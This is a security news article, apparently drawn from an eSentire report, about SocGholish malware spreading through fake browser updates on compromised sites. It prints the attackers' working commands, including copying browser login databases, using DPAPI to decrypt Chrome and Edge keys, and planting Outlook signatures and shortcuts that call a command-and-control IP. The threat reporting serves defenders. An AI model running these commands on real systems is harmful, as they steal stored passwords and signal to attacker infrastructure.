SocGholish Attacks Enterprises Via Fake Browser Updates

Enterprises are being targeted by the malware known as SocGholish through deceptive browser update prompts.

This malware, notorious for its stealth and the complexity of its delivery mechanisms, has been identified in a series of incidents involving fake browser updates that trick users into downloading malicious payloads.

ESentire has recently published a report highlighting the infiltration of enterprises by the SocGholish malware.

This malware is spreading through fake browser updates and is causing significant security concerns for organizations.

The Infection Vector: Compromised Websites

The initial stage of the SocGholish attack involves compromising legitimate websites, where attackers inject malicious JavaScript code.

Unsuspecting users visiting these websites receive pop-up notifications urging them to download browser updates.

These prompts, however, are cleverly disguised traps.

The downloaded file, typically named “Update.js,” harbors the SocGholish malware, initiating the infection process upon execution.

SocGholish Attacks Enterprises Via Fake Browser Updates
Injected JavaScript on a Compromised Website
Deobfuscated script
Deobfuscated script

The SocGholish malware employs sophisticated evasion techniques to avoid detection by automated analysis tools.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

For instance, it checks for automation tools like Selenium through the browser’s “navigator.webdriver” property.

The malware halts further actions if detected, effectively evading automated security analysis.

Upon successful evasion, SocGholish proceeds to execute its payload.

The examples of URLs provided in the script are:




It employs a multi-stage infection process, beginning with the execution of obfuscated JavaScript code that further downloads additional malicious scripts based on user interaction and specific conditions, such as detecting WordPress cookies indicating an admin session.

Contents of Update.js
Contents of Update.js

A POST request is sent to the URL hxxps://tfuq.register.arpsychotherapy.com/editContent by the script.

The data “lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” is sent to the server with the “send” method.

Deobfuscated Update.js
Deobfuscated Update.js

Post-Exploitation Activity

Following the initial compromise, attackers engage in hands-on activity, including the extraction of stored passwords from browsers like Microsoft Edge and Google Chrome  and copying them to a temporary file for exfiltration using the following commands:

"C:WindowsSystem32cmd.exe" /C type "C:UsersusernameAppDataLocalGoogleChromeUser DataDefaultLogin Data" >> "C:UsersusernameAppDataLocalTemp2radC7958.tmp"

"C:WindowsSystem32cmd.exe" /C type "C:UsersusernameAppDataLocalMicrosoftEdgeUser DataDefaultLogin Data" >> "C:UsersusernameAppDataLocalTemp2rad01734.tmp"

Shortly after, another command was run to copy login data files from both Edge and Chrome browsers to a different user’s Downloads directory, then log activity or errors to a temporary file (username – is the primary infected user, usename_2 is another user on the same machine):

"C:WindowsSystem32cmd.exe" /C copy "C:UsersusernameAppDataLocalMicrosoftEdgeUser DataDefaultLogin Data" C:usersusername_2 Downloads395edg.bin&copy "C:UsersusernameAppDataLocalGoogleChromeUser DataDefaultLogin Data" C:usersusername_2Downloads396chr.bin >> "C:UsersusernameAppDataLocalTemp2rad5914F.tmp"

Staging the credential data under another user is likely done for redundancy in case the main files are discovered.

The threat players then tried to use PowerShell to run a command encoded in base64.

Using the DPAPI (Data Protection API), the decoded command gets Edge and Chrome’s encryption keys for passwords and cookies and decrypts them.

It then saves the results in a throwaway file.

The decoded commands:

"C:WindowsSystem32cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATAGoogleChromeUser DataLocal State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:UsersusernameAppDataLocalTemp2rad1F269.tmp"

"C:WindowsSystem32cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATAMicrosoftEdgeUser DataLocal State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:UsersusernameAppDataLocalTemp2rad65036.tmp"

After that, the attackers tried 10 times to run the PowerShell command, which does several things related to downloading, extracting, and setting up a portable version of Python on an infected computer under the “AppDataLocalConnectedDevicesPlatform” path so that it might be used to run more Python payloads.

powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile C:UsersusernameAppDataLocalConnectedDevicesPlatformpython.zip;ls C:Users username AppDataLocalConnectedDevicesPlatformpython.zip;Expand-Archive -LiteralPath C:Users username AppDataLocalConnectedDevicesPlatformpython.zip -DestinationPath C:Users username AppDataLocalConnectedDevicesPlatformpypa;rm C:Users username AppDataLocalConnectedDevicesPlatformpython.zip;ls C:Users username AppDataLocalConnectedDevicesPlatformpypa;wget https://bootstrap.pypa.io/get-pip.py -OutFile C:Users username AppDataLocalConnectedDevicesPlatformpypaget-pip.py;cd C:Users username AppDataLocalConnectedDevicesPlatformpypa;mkdir DLLs;ren python312._pth python312.pth"

The bad guys then used Powershell to run a base64-encoded command that changed the HTML signature files that Microsoft Outlook uses.

"C:WindowsSystem32cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem -Path $env:APPDATAMicrosoftSignatures -Filter *.htm | ForEach-Object { (Get-Content $_.FullName) -replace '</body>', "`r`n<img src=`"file://170.130.55[.]72/logocompany.jpeg`">`r`n</body>" | Set-Content $_.FullName } >> "C:UsersusernameAppDataLocalTemp2rad1F1BD.tmp"

Next, the bad guys ran the C:Windowssystem32net1 group “domain users” /domain command to see a list of the “domain users” group members in a domain setting.

These shortcuts will be created in the network share using the last command.

The destination path takes you to the network share’s location. The icon takes you to the 170.130.55[.]72/Documentation.ico site on the SocGholish C2 network.

"C:WindowsSystem32cmd.exe" /C powershell $W = New-Object -comObject WScript.Shell;$S = $W.CreateShortcut('\<REDACTED>Documentation.lnk');$S.TargetPath = '\<REDACTED>';$S.IconLocation = '\170.130.55[.]72Documentation.ico';$S.Save() >> "C:UsersusernameAppDataLocalTemp2rad69C33.tmp"

Once more, we don’t know what this order is for.

But we think it’s the same as the email signature we talked about above, so we can keep an eye on things.

This is because every time the link files are opened, the C2 server is requested to get the icon file.

The SocGholish intrusion campaign used fake updates and social engineering to get inside. They then used scripted actions to get private data and watch how users interacted with the site.

Recommendations for Defense

In response to the rising threat posed by SocGholish, cybersecurity experts recommend several defensive measures:

  • Endpoint Protection: Ensure all devices have Endpoint Detection and Response (EDR) solutions to detect and mitigate threats.
  • Phishing and Security Awareness Training: Educate employees on the risks associated with downloading files from unverified sources and the importance of verifying the authenticity of browser updates.
  • Password Management: Encourage the use of password managers and discourage storing passwords within browsers.
  • Script Execution Settings: Modify default settings for script files to prevent automatic execution, opting instead for opening with a text editor like Notepad.

The SocGholish malware campaign underscores the critical importance of vigilance and cybersecurity hygiene in the face of increasingly sophisticated social engineering attacks.

By adopting recommended security measures and fostering a culture of awareness, enterprises can significantly mitigate the risk of falling victim to such deceptive tactics.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

The post SocGholish Attacks Enterprises Via Fake Browser Updates appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Go to Source
Author: Divya